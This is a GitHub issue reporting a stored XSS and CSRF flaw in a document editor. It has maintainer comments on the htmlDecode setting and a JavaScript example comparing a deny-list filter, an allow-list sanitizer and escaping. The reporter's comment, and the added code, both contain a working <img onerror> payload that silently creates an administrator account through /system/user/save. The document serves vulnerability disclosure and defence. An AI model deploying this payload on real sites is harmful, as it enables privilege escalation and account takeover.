
Vulnerability: Stored XSS and CSRF #68

Open
0x2E opened this issue May 14, 2019 · 2 comments
Labels
bug Something isn't working

Comments

0x2E commented May 14, 2019

Hello, I found two vulnerabilities: a stored XSS and a CSRF.
An attacker can exploit the vulnerability to execute malicious JavaScript on a document page and hijack the identity of other users (normal users or administrators).

XSS

The document editor does not filter or block the execution of JavaScript, resulting in stored XSS. Any user who browses a document containing the malicious XSS code will trigger the vulnerability.

[image: xss]

CSRF

Using the XSS vulnerability from the previous step, an attacker can hijack the identity of other users. I recorded a GIF to demonstrate a normal user hijacking the super administrator's identity to create a new administrator account.

Payload

<img src=# onerror='eval(decodeURI("var%20a%20=%20window.XMLHttpRequest%20?%20new%20XMLHttpRequest()%20:%20new%20ActiveXObject(%22Microsoft.XMLHTTP%22);a.open(%22POST%22,%22/system/user/save%22,false);a.setRequestHeader(%22Content-type%22,%22application/x-www-form-urlencoded%22);a.send(%22username=hack&given_name=hack&password=hack&email=1%25401.cn&mobile=18888888888&role_id=1&phone=&department=&position=&location=&im=%22);"))'>
phachon added the bug label May 14, 2019

GrandMarch commented May 31, 2019

In /views/page/edit.html, the editor.md option
htmlDecode : "style,script,iframe|on*",
should be changed to
htmlDecode : false,
The other views also seem to have the htmlDecode option set to a permissive value; I didn't look closely, but it seems they can all be disabled, and in theory there is no need for it.

phachon (Owner) commented Jun 1, 2019

@GrandMarch Yes, changing it to htmlDecode : false, so that HTML tags are not parsed, does block it. But for extensibility, being able to write HTML tags directly is more flexible, so I haven't decided yet whether to remove it.
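To make the trade-off discussed in the two comments above concrete, the following is an added example written for this page; it is not code from this project or from editor.md. It runs the reporter's payload through three treatments of raw HTML in Markdown: a hypothetical naive deny-list filter with the same "tags|attributes" shape as the "style,script,iframe|on*" setting, an allow-list sanitizer, and plain HTML escaping (the effect of htmlDecode : false). It also decodes the eval'd string so the request the handler makes is readable. The deny-list filter's internals (in particular, that it only recognises double-quoted attribute values) are an assumption made for illustration and say nothing about how editor.md actually implements the option.

```javascript
// Added example, not mm-wiki or editor.md code. PAYLOAD is a constructed copy
// of the <img onerror> payload from the report; PAYLOAD_DQ is a double-quoted
// variant used for comparison.
const POLICY = "style,script,iframe|on*";
const PAYLOAD = `<img src=# onerror='eval(decodeURI("var%20a%20=%20window.XMLHttpRequest%20?%20new%20XMLHttpRequest()%20:%20new%20ActiveXObject(%22Microsoft.XMLHTTP%22);a.open(%22POST%22,%22/system/user/save%22,false);a.setRequestHeader(%22Content-type%22,%22application/x-www-form-urlencoded%22);a.send(%22username=hack&given_name=hack&password=hack&email=1%25401.cn&mobile=18888888888&role_id=1&phone=&department=&position=&location=&im=%22);"))'>`;
const PAYLOAD_DQ = '<img src=# onerror="alert(1)">';

// Parse a "tag,tag|attr,attr" policy string into tags to drop and attribute
// patterns to strip (the shape of the setting quoted in the comment above).
function parsePolicy(policy) {
  const [tagPart = "", attrPart = ""] = policy.split("|");
  const split = (s) => s.split(",").map((x) => x.trim().toLowerCase()).filter(Boolean);
  return { tags: split(tagPart), attrs: split(attrPart) };
}

// Hypothetical naive deny-list filter (an assumption for this example, NOT
// editor.md's implementation): removes listed tags and strips matching
// attributes, but only recognises double-quoted attribute values, so a
// single-quoted or unquoted handler survives untouched.
function naiveDenyListFilter(html, policy) {
  const { tags, attrs } = parsePolicy(policy);
  let out = html;
  for (const tag of tags) {
    out = out.replace(new RegExp(`<${tag}\\b[^>]*>[\\s\\S]*?<\\/${tag}>`, "gi"), "");
  }
  for (const pat of attrs) {
    const name = pat.endsWith("*") ? pat.slice(0, -1) + "[a-z]*" : pat;
    out = out.replace(new RegExp(`\\s${name}\\s*=\\s*"[^"]*"`, "gi"), "");
  }
  return out;
}

// Escape every HTML metacharacter: what a renderer effectively does when raw
// HTML decoding is turned off, so the payload is shown as text, not executed.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return text.replace(/[&<>"']/g, (c) => map[c]);
}

// Allow-list sanitizer: only known tags and attributes survive, URL attributes
// must be http(s), and everything else (every on* handler included) is dropped.
const ALLOWED = {
  b: [], i: [], em: [], strong: [], p: [], br: [], code: [], pre: [],
  a: ["href", "title"],
  img: ["src", "alt"],
};
const URL_ATTRS = new Set(["href", "src"]);
// Tag regex tolerates '>' inside quoted attribute values; attribute regex
// accepts double-quoted, single-quoted and unquoted values alike.
const TAG_RE = /<(\/?)([a-zA-Z][\w-]*)((?:"[^"]*"|'[^']*'|[^'">])*)>/g;
const ATTR_RE = /([a-zA-Z][\w-]*)(?:\s*=\s*("[^"]*"|'[^']*'|[^\s"'>]+))?/g;

function allowListSanitize(html) {
  let out = "";
  let last = 0;
  for (const m of html.matchAll(TAG_RE)) {
    out += escapeHtml(html.slice(last, m.index));
    last = m.index + m[0].length;
    const closing = m[1] === "/";
    const tag = m[2].toLowerCase();
    if (!Object.prototype.hasOwnProperty.call(ALLOWED, tag)) continue; // unknown tag: dropped
    if (closing) { out += `</${tag}>`; continue; }
    const kept = [];
    for (const a of m[3].matchAll(ATTR_RE)) {
      const name = a[1].toLowerCase();
      if (!ALLOWED[tag].includes(name)) continue;            // drops onerror, onclick, ...
      const value = a[2] === undefined ? "" : a[2].replace(/^["']|["']$/g, "");
      if (URL_ATTRS.has(name) && !/^https?:\/\//i.test(value)) continue; // no javascript: / relative
      kept.push(` ${name}="${escapeHtml(value)}"`);
    }
    out += `<${tag}${kept.join("")}>`;
  }
  return out + escapeHtml(html.slice(last));
}

// Triage helper: pull the decodeURI("...") argument out of a captured payload
// and decode it so the request the handler would issue is readable.
function decodeEvalPayload(html) {
  const m = /decodeURI\("([^"]*)"\)/.exec(html);
  return m ? decodeURI(m[1]) : null;
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("deny-list  :", naiveDenyListFilter(PAYLOAD, POLICY) === PAYLOAD ? "BYPASSED (unchanged)" : "stripped");
  console.log("allow-list :", allowListSanitize(PAYLOAD));
  console.log("escaped    :", escapeHtml(PAYLOAD).slice(0, 40) + "...");
  console.log("decoded    :", decodeEvalPayload(PAYLOAD));
}
```

Run with `node` to see the four outcomes side by side: the naive deny-list strips the double-quoted variant but returns the reporter's single-quoted payload unchanged, the allow-list reduces it to a bare `<img>`, escaping turns it into inert text, and the decoded string shows the synchronous POST to /system/user/save with role_id=1, which is the "CSRF" step of the report.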

No branches or pull requests

3 participants